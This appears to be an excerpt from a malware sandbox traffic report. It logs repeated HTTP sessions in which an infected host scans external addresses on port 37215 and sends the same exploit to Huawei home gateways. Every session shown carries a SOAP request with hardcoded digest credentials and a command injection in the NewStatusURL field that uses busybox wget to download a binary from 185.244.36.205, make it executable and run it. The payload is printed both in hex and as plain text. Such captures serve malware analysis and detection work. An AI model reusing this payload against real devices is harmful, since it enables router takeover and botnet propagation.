                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              975192.168.2.153915631.135.172.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541474104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              976192.168.2.1550012222.106.254.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541513920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              977192.168.2.155003037.133.210.19837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541516066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              978192.168.2.153588631.79.152.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541551113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              979192.168.2.153976694.22.88.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541560888 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              980192.168.2.155487094.224.149.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541573048 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              981192.168.2.1539110181.178.210.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541608095 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              982192.168.2.1541310222.195.25.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.542769909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              983192.168.2.1543354197.14.209.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.551579952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              984192.168.2.1540330157.145.116.11837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.560013056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
